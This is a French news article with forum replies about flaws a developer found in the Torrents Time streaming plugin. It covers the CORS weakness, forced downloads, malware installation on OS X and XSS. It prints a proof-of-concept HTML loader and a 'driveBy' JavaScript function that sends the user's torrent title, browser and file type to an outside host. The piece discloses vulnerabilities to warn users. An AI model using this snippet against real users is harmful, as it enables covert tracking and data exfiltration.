Discussion :

[Olivier Famien]

Plusieurs failles détectées dans le plugin Torrents Time utilisé pour regarder les films en streaming
les utilisateurs abandonneront-ils ce plugin ?

Pour télécharger les applications et les films sur la toile, il y a ceux qui se tournent vers les sources légales telles que les magasins de vente en ligne et d’autres qui préfèrent ne pas mettre la main à la poche et utiliser les sites de téléchargements illégaux. Cette dernière solution, bien que pavée de beaucoup de risques, n’empêche pas les internautes de s’y adonner.

Et depuis quelques semaines, les sites de partage tels que The Pirate Bay et Kickass, pour ne citer que ceux-là, ont intégré à leur plateforme un moyen supplémentaire de télécharger et regarder les films. Pour y arriver, ces sites de partage s’appuient sur Torrents Time, un plugin mis à la disposition des internautes assez récemment.

En guise de rappel, Torrents Time est un fichier regroupant à la fois un client torrent, un lecteur vidéo en streaming et un gestionnaire de téléchargement installé directement dans le navigateur. Ayant été intégré à certains sites de partage de fichiers en pair à pair, ce plugin connait depuis sa sortie une grande adoption.

Toutefois, un développeur du nom d’Andrew Sampson a détecté de nombreuses failles dans ce plugin.

De prime abord, il faut savoir que pour empêcher que des ressources extérieures à un domaine donné soient injectées dans le navigateur d’un internaute, l’équipe de développeurs de Torrents Time s’est appuyée sur le mécanisme de sécurité CORS (Cross-Origin Resource Sharing).

Mais, après avoir examiné son implémentation, Andrew a remarqué que lorsque vous appelez une instance du plugin, le service expose les objets de l’API XMLHttpRequest permettant de faire appel à des ressources à partir d’autres domaines.

C’est cette faille qu’Andrew a examinée en profondeur pour accéder aux fonctions du plugin installé sur son navigateur. Pour cela, après avoir lancé une instance du Torrents Time dans le navigateur, il a chargé le code suivant dans le code du plugin :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
<html>
<title>Hello World</title>
<head lang="en">
    <script src="torrents.js"></script>
    <script src="https://localhost.ttconfig.xyz:12400/api.js"></script>
    <script src="attack.js"></script>
    <meta charset="UTF-8">
    <title></title>
</head>
<body>
</body>
</html>

Une fois que torrents.js (contenant le code du Content Delivery Network en abrégé CDN) et https://localhost.ttconfig.xyz:12400/api.js sont chargés, le script attack.js pourra utiliser toutes les fonctions du plugin sur n’importe quelle page. À partir de là, plusieurs scénarios sont envisageables.

En passant par le CDN, Andrew peut forcer un utilisateur distant à télécharger du contenu illégalement sans que ce dernier s’en rende compte. L’élément assez effrayant est qu’un attaquant pourrait en profiter pour installer en arrière-plan un malware qui servira à d’autres fins.

À côté de cela, Andrew explique également qu’un annonceur pourrait injecter le code ci-dessous sur sa page afin de collecter les données sur les utilisateurs ayant accès à cette page afin de les suivre sur la toile.

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
function driveBy() {

    //Torrents-time detected!
    //i0 is the first instance, loop over instances to get all currently started torrents
    var torrentTitle = torrentsTime.instances.i0.setup.title;
    var browser = torrentsTime.instances.i0.setup.browser;
    var filetype = torrentsTime.instances.i0.setup.fileType;
    //any other code we want to do on the page

    //this supports callback/JSONP
    //use the exposed xhr
    torrentsTime.utils.xhr("https://andrew.im/sandbox/tracktt.php?title=" + torrentTitle + "&browser=" + browser + "&filetype=" +filetype, callback);
}

function callback(data) {
    console.log(data);
}

En outre, étant donné que Torrents Time fonctionne sur OS X avec des privilèges administrateur, un tiers malveillant pourrait se servir de ces failles pour installer des applications malveillantes en combinant les techniques déjà présentes ou encore en redirigeant le lien de téléchargement du plugin vers une adresse proposant un binaire infecté.

Enfin, Andrew a pu constater que les sites ayant intégré Torrents Time sur leurs pages présentent des failles cross-site scripting (XSS) qui permettent d’injecter du code dans des pages web afin de modifier leur comportement.

La liste des possibilités étant longue, nous allons nous arrêter à ce niveau. Après ces explications, il n’est nul besoin de mener une campagne afin de déconseiller l’utilisation de ce plugin au-delà du caractère illégal que revêt le téléchargement des œuvres intellectuelles soumises aux droits d’auteur. Toutefois, est-ce suffisant pour les utilisateurs afin de les dissuader de l’utiliser ? Les utilisateurs de ce plugin ne continueront-ils pas leur chemin comme si de rien n’était ?

Source : Blog Andrew Sampson

Et vous ?

Utilisez-vous ce plugin ? Que pensez-vous de ces failles ?

Allez-vous arrêter d’utiliser ce plugin au regard des failles citées ?

Voir aussi

Forum

[Aiekick]

rien n'est gratuit.

[TiranusKBX]

@cuicui78
vous avez raison, par ailleurs vous devez à l'état 6248,52€ de taxe pour oxygène consommé

[jfadev]

Il existe déjà Ace Stream qui fait la même chose.

[atha2]

En passant par le CDN, Andrew peut forcer un utilisateur distant à télécharger du contenu illégalement sans que ce dernier s’en rende compte. L’élément assez effrayant est qu’un attaquant pourrait en profiter pour installer en arrière-plan un malware qui servira à d’autres fins.

Il faudra quand même m’expliquer comment c'est possible, à part utiliser une autre faille, je vois pas trop comment on pourrait installer un malware (ou télécharger du contenu) sur le PC...

[Aiekick]

simple, le malware c'est windows.

[lankoande]

Ces gars là ont toujours plus d'un tour dans leur sacs.

Moi particulièrement, je n'utilise pas ce plugin et je ne pense même pas l'utiliser

parce ce que c'est m'exposé à un danger que je ne maîtrise pas, vu la menace qui

y réside !